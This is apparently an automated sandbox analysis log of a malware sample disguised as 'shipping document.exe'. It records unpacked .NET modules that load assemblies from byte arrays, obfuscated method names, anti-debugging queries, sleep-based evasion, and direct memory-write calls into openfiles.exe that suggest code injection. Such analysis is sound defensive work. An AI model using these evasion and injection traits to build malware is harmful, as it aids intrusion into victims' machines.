Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: shipping document.exe, OptionsForm.cs	.Net Code: InitializeComponent
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.cs	.Net Code: XDAt7X96fy System.Reflection.Assembly.Load(byte[])
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.cs	.Net Code: XDAt7X96fy System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_0315DB84 pushfd ; ret	0_2_0315DB89
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 0_2_07C53E3A push ds; ret	0_2_07C53E3B
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_00401873 pushad ; iretd	2_2_00401874
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0041E88B push 78FC4EB7h; retf	2_2_0041E89B
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0040BCDD push edi; ret	2_2_0040BCDE
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_004014A7 push cs; iretd	2_2_00401525
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_004014B0 push cs; iretd	2_2_00401525
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_004035C0 push eax; ret	2_2_004035C2
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0040A5FC push di; iretd	2_2_0040A604
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_00418656 push ecx; ret	2_2_00418657
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0173225F pushad ; ret	2_2_017327F9
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017327FA pushad ; ret	2_2_017327F9
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_017609AD push ecx; mov dword ptr [esp], ecx	2_2_017609B6
Source: C:\Users\user\Desktop\shipping document.exe	Code function: 2_2_0173283D push eax; iretd	2_2_01732858
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B25BF3 push esp; iretd	6_2_03B25C1E
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B1EAA1 push 78FC4EB7h; retf	6_2_03B1EAB1
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B0A818 push di; iretd	6_2_03B0A81A
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B1886C push ecx; ret	6_2_03B1886D
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	Code function: 6_2_03B0BEF3 push edi; ret	6_2_03B0BEF4
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048727FA pushad ; ret	7_2_048727F9
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0487225F pushad ; ret	7_2_048727F9
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0487283D push eax; iretd	7_2_04872858
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_048A09AD push ecx; mov dword ptr [esp], ecx	7_2_048A09B6
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0279871A push edi; ret	7_2_0279871B
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027AB2C8 push 78FC4EB7h; retf	7_2_027AB2D8
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_0279703F push di; iretd	7_2_02797041
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027A5093 push ecx; ret	7_2_027A5094
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027A5115 push esp; retf D771h	7_2_027A50E1
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027A7AF5 push esp; ret	7_2_027A7AF6
Source: C:\Windows\SysWOW64\openfiles.exe	Code function: 7_2_027A7C90 push edx; ret	7_2_027A7C96

Source: 0.2.shipping document.exe.a640000.7.raw.unpack, LPvi3oP3RIhwgOcdmE.cs	High entropy of concatenated method names: 'jOJjZbJoMs', 'XPKjBdh8Yt', 'ToString', 'eCBjX6LUgQ', 'zJsjuEeDu0', 'mysjMkZL3O', 'l9KjNg4rGE', 'DPMj2ln57p', 'cT4jCKmgun', 'INyjrZHADc'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, y5Qi5ClcJClfyxEEUt.cs	High entropy of concatenated method names: 'qvg7wG16T', 'vD4PNX64K', 'ld4U4WvOh', 'ASb4I1Vhd', 'jFQYsDsuG', 'T7hHVx31q', 'o7QI4WL4Ox7aptVets', 'jMYNL8pXTmOW9Z3Nq8', 'DCGifCvGD', 'WYIG3xnnS'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, DP3hNizluiilH0Kbtj.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wS10xJy5Sa', 'Ij10OR4JJT', 'iOw0vKYQwK', 'j1I0jUTYSm', 'v3L0i3xUUE', 'n7D00ZYxQn', 'G1I0Gl2iRh'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GAKx9mnM0VBWIobfpZ.cs	High entropy of concatenated method names: 'bS8iXPs3qm', 'FM1iuRxWgR', 'grMiMukUTq', 'ffxiN67Ris', 'nP8i25rk9G', 'HaSiCnTSi6', 'SUnirydR3d', 'p0Qi8N9yk0', 'zkTiZ2BZug', 'GJgiBoOMyu'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, Do078usZjI0jdkJhZb.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'c6Rh9tX3l0', 'b4Kha4ToaO', 'yF8hzhZc6x', 'cfWLw0yx5D', 'SJBLsRXNof', 'MiELhBiLCh', 'S7yLL0AKw9', 'PKqcS62uwcRc4IYrumL'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, xOtm9kyFM4kmikJTQP.cs	High entropy of concatenated method names: 'xx3sCVJP7Y', 'RDlsr5xvlp', 'C3bsZtuEe1', 'AaVsBoIT90', 'qnRsOAQCIp', 'IaxsvVTG6a', 'xPvhg2mJs6jKLlXy7g', 'hn3th4NRDsHrtJ1RXu', 'wwun4Z1QVekaIeSgM0', 'R20ssyNNSI'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.cs	High entropy of concatenated method names: 'KNALTLU5re', 'LMOLXAQHwl', 'wt2LuHNApy', 'HqFLMhGCR7', 'eo0LNRVT6g', 'KrgL2l05xl', 'sHFLCKwntW', 'k0FLr2TVx6', 'RccL8yTZBh', 'EHjLZOYIEH'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, hrjkNWo5sorSlwedoL.cs	High entropy of concatenated method names: 'CESCD2KnPA', 'LjEC6dUa1Y', 'zBrC7GGIdx', 'X91CPpb3ij', 'Xn9CfcgkQ6', 'BNuCUItcti', 'IBKC4aQbGu', 'KWuCdT9YJT', 'F0qCYWCLAC', 'INwCHI9AIV'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, iKb0caErrx0OaEK35J.cs	High entropy of concatenated method names: 'HxS2TNnegw', 'yY42uF3Z38', 'kTM2NlIlZO', 'FPd2CXNcWn', 'pRU2rlECKD', 'IMANoSQ27h', 'f4GNE8hoSk', 'm77NFa1WhS', 'XmeNqPa5GL', 'vGSN9gF23W'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, skp1uwharrgpfQKevg.cs	High entropy of concatenated method names: 'EsrMPu912D', 'nl9MU61B63', 'MgoMdrSQHy', 'FWoMY9VF7M', 'ceQMOpPFxR', 'GJ4MvaGFZp', 'YNQMjbiLsx', 'TBZMiKcvGF', 'hf7M0dqMqB', 'qLhMGHXZ1b'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, YDmVa3b2SMMfc8PDHv.cs	High entropy of concatenated method names: 'gYBuJN9rEx', 'Hbuu3NCpke', 'qFNuAIN9dZ', 'mYWueL9Vfb', 'hwluoBxrs3', 'NjwuE1xRmI', 'eYVuFyvpfo', 'Q7Juq2DQQ7', 'AC9u9DJTcr', 'DDNuahU9H3'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, omX1sAmpb7YlgoyEOa.cs	High entropy of concatenated method names: 'lf9jqTj4FA', 'Kyfjabxrm9', 'Kveiw95qT7', 'vbSisxBjrh', 't05jbioFSF', 'CJGjIqPfcn', 'alxjWZrc3c', 'vHYjJs4Gnc', 'WhHj3LZ7oE', 'INljAcxIOk'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, QFbnZv5nUopkM31AEm.cs	High entropy of concatenated method names: 'zum0si84un', 'xNV0LbWBrA', 'Hwb0tM3qsV', 'bqZ0X7R5Rl', 'FLV0uWem5H', 'z9M0NQQ6It', 'BUf02pAQGf', 'CxSiFXhlhx', 'FyRiqrYqVF', 'p3ji9UZjtB'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, L80iZtF00YB24EpXgL.cs	High entropy of concatenated method names: 'wW5xdRCfZx', 'Xg6xYnFlJE', 'Oh6x1W6C4f', 'MA8xS5GL5o', 'PFfxRDdMLU', 'DXKx57J8QE', 'wkJxpYN0qt', 'm5nxKbe9O9', 'zTTxQP8Tve', 'HLexbOvGlN'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, ejoofSV7fnSjUw2fi6.cs	High entropy of concatenated method names: 'Re1CXD0QXu', 'WTNCM9Oof7', 'uq4C2hukhw', 'tsm2aStNq9', 'L4n2z51Cp5', 'IVOCwcmiYQ', 'kqJCsBO9YC', 'welChY4ljj', 'KJPCLsZbxs', 'nIbCtIyaEj'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, xMm9lx8h3995ywK4BF.cs	High entropy of concatenated method names: 'Dispose', 'Ua2s9FEIGV', 'fMlhS5qrWP', 'x0GVVJ6G8Y', 'ThqsaY4Pjv', 'm87szn8ZJu', 'ProcessDialogKey', 'I50hwR3cvu', 'SJBhsi6qx2', 'oj4hhRxXwi'
Source: 0.2.shipping document.exe.a640000.7.raw.unpack, iG14yNa7nO8cosR7XGL.cs	High entropy of concatenated method names: 'tPB0DlTMiG', 'lW106Lp4FB', 'Aon074uARG', 'D8m0PtWLCV', 'zut0faXsrg', 'Nri0UPs5D2', 'mTo04mg48b', 'LD40dqnuZc', 'uZQ0YpuL9A', 'N7j0HK1nwB'
Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, LPvi3oP3RIhwgOcdmE.cs	High entropy of concatenated method names: 'jOJjZbJoMs', 'XPKjBdh8Yt', 'ToString', 'eCBjX6LUgQ', 'zJsjuEeDu0', 'mysjMkZL3O', 'l9KjNg4rGE', 'DPMj2ln57p', 'cT4jCKmgun', 'INyjrZHADc'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, y5Qi5ClcJClfyxEEUt.cs	High entropy of concatenated method names: 'qvg7wG16T', 'vD4PNX64K', 'ld4U4WvOh', 'ASb4I1Vhd', 'jFQYsDsuG', 'T7hHVx31q', 'o7QI4WL4Ox7aptVets', 'jMYNL8pXTmOW9Z3Nq8', 'DCGifCvGD', 'WYIG3xnnS'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, DP3hNizluiilH0Kbtj.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wS10xJy5Sa', 'Ij10OR4JJT', 'iOw0vKYQwK', 'j1I0jUTYSm', 'v3L0i3xUUE', 'n7D00ZYxQn', 'G1I0Gl2iRh'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GAKx9mnM0VBWIobfpZ.cs	High entropy of concatenated method names: 'bS8iXPs3qm', 'FM1iuRxWgR', 'grMiMukUTq', 'ffxiN67Ris', 'nP8i25rk9G', 'HaSiCnTSi6', 'SUnirydR3d', 'p0Qi8N9yk0', 'zkTiZ2BZug', 'GJgiBoOMyu'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, Do078usZjI0jdkJhZb.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'c6Rh9tX3l0', 'b4Kha4ToaO', 'yF8hzhZc6x', 'cfWLw0yx5D', 'SJBLsRXNof', 'MiELhBiLCh', 'S7yLL0AKw9', 'PKqcS62uwcRc4IYrumL'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, xOtm9kyFM4kmikJTQP.cs	High entropy of concatenated method names: 'xx3sCVJP7Y', 'RDlsr5xvlp', 'C3bsZtuEe1', 'AaVsBoIT90', 'qnRsOAQCIp', 'IaxsvVTG6a', 'xPvhg2mJs6jKLlXy7g', 'hn3th4NRDsHrtJ1RXu', 'wwun4Z1QVekaIeSgM0', 'R20ssyNNSI'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.cs	High entropy of concatenated method names: 'KNALTLU5re', 'LMOLXAQHwl', 'wt2LuHNApy', 'HqFLMhGCR7', 'eo0LNRVT6g', 'KrgL2l05xl', 'sHFLCKwntW', 'k0FLr2TVx6', 'RccL8yTZBh', 'EHjLZOYIEH'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, hrjkNWo5sorSlwedoL.cs	High entropy of concatenated method names: 'CESCD2KnPA', 'LjEC6dUa1Y', 'zBrC7GGIdx', 'X91CPpb3ij', 'Xn9CfcgkQ6', 'BNuCUItcti', 'IBKC4aQbGu', 'KWuCdT9YJT', 'F0qCYWCLAC', 'INwCHI9AIV'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, iKb0caErrx0OaEK35J.cs	High entropy of concatenated method names: 'HxS2TNnegw', 'yY42uF3Z38', 'kTM2NlIlZO', 'FPd2CXNcWn', 'pRU2rlECKD', 'IMANoSQ27h', 'f4GNE8hoSk', 'm77NFa1WhS', 'XmeNqPa5GL', 'vGSN9gF23W'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, skp1uwharrgpfQKevg.cs	High entropy of concatenated method names: 'EsrMPu912D', 'nl9MU61B63', 'MgoMdrSQHy', 'FWoMY9VF7M', 'ceQMOpPFxR', 'GJ4MvaGFZp', 'YNQMjbiLsx', 'TBZMiKcvGF', 'hf7M0dqMqB', 'qLhMGHXZ1b'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, YDmVa3b2SMMfc8PDHv.cs	High entropy of concatenated method names: 'gYBuJN9rEx', 'Hbuu3NCpke', 'qFNuAIN9dZ', 'mYWueL9Vfb', 'hwluoBxrs3', 'NjwuE1xRmI', 'eYVuFyvpfo', 'Q7Juq2DQQ7', 'AC9u9DJTcr', 'DDNuahU9H3'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, omX1sAmpb7YlgoyEOa.cs	High entropy of concatenated method names: 'lf9jqTj4FA', 'Kyfjabxrm9', 'Kveiw95qT7', 'vbSisxBjrh', 't05jbioFSF', 'CJGjIqPfcn', 'alxjWZrc3c', 'vHYjJs4Gnc', 'WhHj3LZ7oE', 'INljAcxIOk'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, QFbnZv5nUopkM31AEm.cs	High entropy of concatenated method names: 'zum0si84un', 'xNV0LbWBrA', 'Hwb0tM3qsV', 'bqZ0X7R5Rl', 'FLV0uWem5H', 'z9M0NQQ6It', 'BUf02pAQGf', 'CxSiFXhlhx', 'FyRiqrYqVF', 'p3ji9UZjtB'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, L80iZtF00YB24EpXgL.cs	High entropy of concatenated method names: 'wW5xdRCfZx', 'Xg6xYnFlJE', 'Oh6x1W6C4f', 'MA8xS5GL5o', 'PFfxRDdMLU', 'DXKx57J8QE', 'wkJxpYN0qt', 'm5nxKbe9O9', 'zTTxQP8Tve', 'HLexbOvGlN'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, ejoofSV7fnSjUw2fi6.cs	High entropy of concatenated method names: 'Re1CXD0QXu', 'WTNCM9Oof7', 'uq4C2hukhw', 'tsm2aStNq9', 'L4n2z51Cp5', 'IVOCwcmiYQ', 'kqJCsBO9YC', 'welChY4ljj', 'KJPCLsZbxs', 'nIbCtIyaEj'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, xMm9lx8h3995ywK4BF.cs	High entropy of concatenated method names: 'Dispose', 'Ua2s9FEIGV', 'fMlhS5qrWP', 'x0GVVJ6G8Y', 'ThqsaY4Pjv', 'm87szn8ZJu', 'ProcessDialogKey', 'I50hwR3cvu', 'SJBhsi6qx2', 'oj4hhRxXwi'
Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, iG14yNa7nO8cosR7XGL.cs	High entropy of concatenated method names: 'tPB0DlTMiG', 'lW106Lp4FB', 'Aon074uARG', 'D8m0PtWLCV', 'zut0faXsrg', 'Nri0UPs5D2', 'mTo04mg48b', 'LD40dqnuZc', 'uZQ0YpuL9A', 'N7j0HK1nwB'
Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.cs	High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, vpednoN8EZgsJ4TDwx.cs	High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'

Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\shipping document.exe	Memory allocated: 3110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Memory allocated: 33A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Memory allocated: 31A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Memory allocated: 7FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Memory allocated: 8FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Memory allocated: 9140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Memory allocated: A140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Memory allocated: A6D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Memory allocated: B6D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Memory allocated: C6D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\shipping document.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\openfiles.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\shipping document.exe TID: 6416	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452	Thread sleep count: 149 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452	Thread sleep time: -298000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452	Thread sleep count: 9822 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452	Thread sleep time: -19644000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\openfiles.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\openfiles.exe	Last function: Thread delayed

Source: oWRaEnEJAq.exe, 00000008.00000002.4110608352.00000000014F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2318590089.000002CA98FEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\shipping document.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtClose: Direct from: 0x76F02B6C
